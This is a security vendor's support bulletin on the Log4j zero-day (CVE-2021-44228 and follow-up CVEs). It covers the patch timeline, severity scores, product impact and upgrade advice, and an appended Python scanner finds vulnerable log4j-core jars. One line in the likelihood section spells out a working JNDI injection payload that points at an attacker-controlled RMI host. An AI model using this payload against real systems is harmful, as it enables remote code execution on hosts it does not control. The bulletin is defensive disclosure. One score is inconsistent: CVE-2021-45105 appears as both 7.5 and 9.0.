Support Bulletin: Log4J Zero-Day Impact on Contrast Applications


Originally posted: Dec 10th, 2021 (All times Eastern/ U.S.)

This page is updated frequently. Please see the date/time (GMT) in the byline for the most recent update to this article.

We have been closely following the log4j issues over the past few weeks. Regarding CVE-2021-44832: this vulnerability relies on a non-standard log4j configuration, which we do not use. Exploiting it would require a malicious actor to have access to modify the log4j configuration file, which in turn requires elevated privileges. The risk is therefore extremely low, and the initial Apache Software Foundation CVSS score rates it a 6.6. Our standard vulnerability management process follows a 30-day fix window for vulnerabilities of this rating. More information can be found here: CVSS Score

What happened? What and who specifically does this impact?

A zero-day vulnerability in the ubiquitous Log4J library was published at ~9:30 a.m. US Eastern on 2021-12-09 and is now tracked as CVE-2021-44228.

All Contrast customers were impacted. The vulnerable library was confirmed to be in use in the Contrast application in both SaaS and On-Premises (“EOP”) deployments. Contrast has identified no evidence of any penetration at this time.

  • 12/9/2021 at 22:15 EST, Contrast had already patched the SaaS application to log4j 2.15.
  • 12/14/2021 at 15:37 EST, Contrast has patched all SaaS applications to log4j 2.16.
  • 12/18/2021 at 11:36 EST, Contrast has patched all SaaS applications to log4j 2.17.
  • 12/18/2021 at 12:18 EST, Contrast has released a patched EOP with log4j 2.17.

With the upgrade to log4j 2.17, this covers:

  • CVE-2021-44228
  • CVE-2021-45046
  • CVE-2021-45105

For On-Premises customers, Contrast has released a patched version with log4j 2.17, and all customers are recommended to upgrade to it.

Of note: while Contrast software is impacted and we are notifying all customers, it is extremely likely that your company’s Java application portfolio is also impacted. Please take measures to upgrade/update your portfolio immediately. Protect guards most applications against most vectors, including published POCs, and we are working to close gaps we have identified internally.

What is the vulnerability / incident?

CVE-2021-44228 - More information from the National Vulnerability Database can be found (here).

Additional references can be found on social media platforms like Twitter (here). 

Why is it bad?

The library in question is very widely distributed across Java applications. Contrast believes this CVE will have an extremely broad impact in the community, affecting the majority of Java applications.

Contrast has confirmed this library was in use across several Contrast products (detail below). 

How likely is it? 

Any application that uses Log4j to log any attacker-controlled information is vulnerable, including HTTP headers, URIs, parameters, or cookies. Exploitation is exceptionally simple and can be easily automated. For example, sending “${jndi:rmi://192.168.1.31:1099/9tmpja}” in a single HTTP request is enough to take full control of the application host. The risk is especially high if your system is reachable from the public Internet, as we are detecting widespread automated attacks against our customers. Contrast Labs has confirmed that it is exploitable.

Our evaluation efforts will continue and we will keep you apprised of our progress.

How severe is it? 

While these CVEs are still under scrutiny by the National Institute of Standards and Technology (NIST), NIST has set initial CVSS scores. The Apache Software Foundation, however, continues to update its scores. Contrast experts agree with the ASF scoring and have updated our CVE scoring to reflect these updates.

CVE-2021-44228 - CVSS 10.0

  • More information from the National Vulnerability Database can be found (here)
  • Apache Software Foundation rates this as a 10.0 CVSS (here)
  • Fixed in version 2.15

CVE-2021-45046 - CVSS 9.0

  • More information from the National Vulnerability Database can be found (here)
  • Apache Software Foundation rates this as a 9.0 CVSS (here)
  • Fixed in version 2.16

CVE-2021-45105 - CVSS 7.5

  • More information from the National Vulnerability Database can be found (here)
  • Apache Software Foundation rates this as a 9.0 CVSS (here)
  • Fixed in version 2.17

How is this relevant for Contrast Security and which customers might be impacted?   

Contrast hosted (SaaS) customers would have been impacted had this been exploited. Our teams have patched all hosted (SaaS) systems, and no evidence of penetration has been detected. 

Contrast EOP customers whose systems are accessible via the web should patch their systems immediately. A patched version of EOP has been released and all customers are recommended to upgrade ASAP.

The Contrast Java agent is not impacted. In order for Contrast Security products to support applications that use legacy technologies and frameworks such as Java 6, Java 7 and JBoss, our Java agent uses an older version of log4j (1.x). Our team audits our dependencies for security risk and has found our usage of log4j 1.x to be an acceptable risk. However, we are looking into releasing a newer version of the Java agent that does not depend on log4j 1.x, which may not support the legacy frameworks mentioned above.

Product status (Impacted / Protected / Patched):

Hosted (SaaS) Environments (all)
  • Impacted: Yes
  • Protected: Yes (Contrast Protect in place)
  • Patched: Yes
      • 22:15 EST 12/9/21: Patched in version 20211210-0244.7cb22d5f24
      • 12/14/21: Latest patched version brings log4j to v2.16 (20211214-1919.f9997ec34b)
      • 12/18/21: Latest patched version brings log4j to v2.17 (20211218-1347.94611350e8)
      • 01/04/22: Latest patched version brings log4j to 2.17.1 (20220105-0044.b896b7f413)

On-premises (EOP) Environments
  • Impacted: Yes
  • Protected: No
  • Patched: Yes
      • 12/10/21: Upgraded Log4j to 2.15 in version 3.8.10.1566200307
      • 12/16/21: Upgraded Log4j to 2.16 in version 3.8.10.1589286247
      • 12/18/21: Upgraded Log4j to v2.17 in version 3.8.10.1596449597
      • 01/11/22: Upgraded Log4j to v2.17.1 in version 3.8.11.1683721903

Java Agent
  • Impacted: No
  • Protected: N/A
  • Patched: N/A

Scan
  • Impacted: Yes
  • Protected: Yes (Contrast Protect in place)
  • Patched: Yes
      • 15:35 EST 12/10/21: Patched in version 0.0.124
      • 12/15/21: Scan Microservice updated to Logback 1.2.8
      • 12/15/21: Scan Engine updated to log4j 2.16
      • 12/19/21: Scan Engine updated to log4j 2.17
      • 01/05/22: Scan Engine updated to log4j 2.17.1

How does a Contrast customer determine if and where they’re vulnerable?  

All versions of Contrast EOP Teamserver prior to 3.8.10.1566200307 are vulnerable to this zero-day. Additionally, per ASF recommendations, we have released 3.8.10.1589286247, which adds further protection against CVE-2021-45046 by updating to log4j 2.16. A further release, 3.8.10.1596449597, adds protection against CVE-2021-45105 by updating to log4j 2.17.

What should a Contrast customer do, if anything?

On-Premises customers are recommended to upgrade to the latest patched version (3.8.10.1596449597 or higher) available on Hub (here). Standard upgrade instructions (here) can be followed.

For customers’ own portfolios of Java applications, customers will need to search for the vulnerable library in their apps and update to the patched library as soon as possible. Contrast Labs has also confirmed that Contrast Assess will flag this vulnerability as “Log Injection” in vulnerable code paths. Contrast SCA will also identify the vulnerable library. Contrast has published a blog with recommended fixes for all vulnerable Java applications here: https://www.contrastsecurity.com/security-influencers/0-day-detection-of-log4j2-vulnerability
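As an added example (not Contrast's code or tooling), the following Python inventory check does the "search for the vulnerable library" step above: it opens each jar/war/ear, reads the bundled log4j-core version from its Maven pom.properties, records whether JndiLookup.class is present, and maps the version against the fix versions this bulletin lists (2.15, 2.16, 2.17). It recurses into nested archives; the make_sample_war helper builds a constructed sample WAR for demonstration, not a real build.

```python
import io
import re
import zipfile

FIXED_IN = {  # fix versions as stated in the bulletin: each CVE is closed by that log4j-core release
    "CVE-2021-44228": (2, 15, 0),
    "CVE-2021-45046": (2, 16, 0),
    "CVE-2021-45105": (2, 17, 0),
}
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

def parse_version(text):
    """Read 'version=2.14.1' (or '2.17') from pom.properties into a comparable tuple."""
    m = re.search(r"^\s*version\s*=\s*(\d+)\.(\d+)(?:\.(\d+))?", text, re.M)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else None

def open_cves(version):
    """Bulletin CVEs a log4j-core 2.x of this version is still exposed to (1.x: none of them)."""
    return [cve for cve, fixed in FIXED_IN.items() if version[0] == 2 and version < fixed]

def scan_archive(data, name, findings):
    """Inspect one archive given as bytes, recursing into jars/wars nested inside it."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # not a zip container: nothing to inspect
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names:  # this archive is (or bundles) log4j-core itself
            ver = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
            findings.append({"archive": name, "version": ver,
                             "jndi_lookup_present": JNDI_CLASS in names,
                             "open_cves": open_cves(ver) if ver else ["unknown-version"]})
        for inner in names:  # e.g. WEB-INF/lib/log4j-core-2.14.1.jar inside a WAR
            if inner.lower().endswith((".jar", ".war", ".ear")):
                scan_archive(zf.read(inner), name + "!/" + inner, findings)
    return findings

def make_sample_war(version):
    """Constructed sample input: a WAR wrapping a minimal fake log4j-core jar (not a real build)."""
    jar = io.BytesIO()
    with zipfile.ZipFile(jar, "w") as z:
        z.writestr(POM_PROPS, "version=%s\n" % version)
        z.writestr(JNDI_CLASS, b"")
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as z:
        z.writestr("WEB-INF/lib/log4j-core-%s.jar" % version, jar.getvalue())
    return war.getvalue()
```

To inventory a real deployment, walk the application directory with os.walk and pass the bytes of every jar/war/ear to scan_archive, accumulating into one findings list.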

 

If you have any questions, concerns, or would like to discuss this issue further, please don’t hesitate to reach out to us via the link below or at support@contrastsecurity.com.

 
